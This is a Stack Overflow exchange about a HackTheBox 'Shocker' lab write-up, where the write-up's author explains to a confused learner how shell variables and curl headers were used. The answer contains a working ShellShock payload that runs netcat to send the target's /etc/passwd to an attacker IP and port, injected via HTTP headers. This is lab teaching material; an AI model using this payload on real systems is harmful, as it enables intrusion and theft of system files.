# curl Usage to dit the file or update

Tags: curl

Please help me with queries
in the hack the box Platform i Follow the Written of one of the machine
https://benheater.com/hackthebox-shocker/
i Sack on the mid of the page specificity in the Target side
how the guy use the curl to edit the File
i try money times something messing

please look for the link for the page above

I try with curl but and i except the answer with curl

curl Usage on the target side

Comment: Welcome to Stack Overflow.
Please take the [tour] to learn how Stack Overflow works and read [ask] on how to improve the quality of your question.
Then [edit] your question to include your source code as a working [mcve], which can be tested by others to provide an answer faster.
Please show your attempts you have tried and the problems/error messages you get from your attempts.
It is unclear what you are asking or what the problem is.
Please [edit] your question to include a more detailed description of the problem you have.

Answer (score 1):

I am the author of the article you linked above.

> how the guy use the curl to edit the File

I did not use `curl` to ***edit*** any file at all. I used the ShellShock vulnerability in some HTTP headers to achieve remote code execution on the target.

On this particular HackTheBox target, **Shocker**, you are tasked with finding and leveraging the ShellShock vulnerability on the Bash CGI script on the target server.

As you should note in the `curl` command on my write-up, I'm setting a few variables to inject into three different HTTP headers.

```bash
# Set some variables to hold the payload
ATTACK_IP='10.10.14.3'
ATTACK_PORT=80
PWN="() { :;}; /bin/bash -c 'nc -n $ATTACK_IP $ATTACK_PORT < /etc/passwd'"
```

`ATTACK_IP` is my HackTheBox VPN IP address. `ATTACK_PORT` is the TCP port on which my `nc` listener is bound. `PWN` is the ShellShock payload to run `nc` on the target. All I'm doing in this instance is sourcing in `/etc/passwd` on target and sending it over the TCP socket back to my `nc` server. **No files were edited at any point during this process.**

If you haven't done so already, please take some time to familiarize yourself with the ShellShock payload `() { :;}; some_command_here`, which is defining a function and chaining the next command using the `;` and executing `some_command_here` -- where `some_command_here` is the next command to be run on the target.

I hope that helps.

Comment: thanks sir for your replay  but i still confuse

Comment: I used the ShellShock vulnerability in some HTTP headers

Comment: Please How you used the ShellShock vulnerability in some HTTP headers other thing is Clear where to set the variable

Comment: You should take some time to familiarize yourself with `curl` usage, and perhaps a fundamental understanding of HTTP if you feel you're unsure what HTTP headers are. With `curl`, you can use the `-H 'Header-Name: header_value'` syntax to specify as many headers as you wish. You'll see that I'm inserting the `$PWN` variable into a few headers this way with `curl`.

Comment: my issue not to use the curl and HTTP header i know very well my problem with first part (Set some variables to hold the payload) i know my IP and port and variable and i know the shell shock attack  but how to do it where i put the this variable in different file or what  and the third part (unset PWN) this is different command or What  i am very happy to disc with you because i read all blog very well great resources . My issues with first and third steps its file or command in the shell or what But  second steps very easy easy i know HTTP header very well Sorry sir  for this disc.

Comment: You're just setting those variables on the command line in your current terminal session. You're not adding them to any file, script, or otherwise. If we were creating a script file, I would have indicated so in my write-up. If you create a variable, say `MY_VAR="hello world"` on the command line, this variable exists until you close the terminal or `unset MY_VAR`. Hope that makes sense.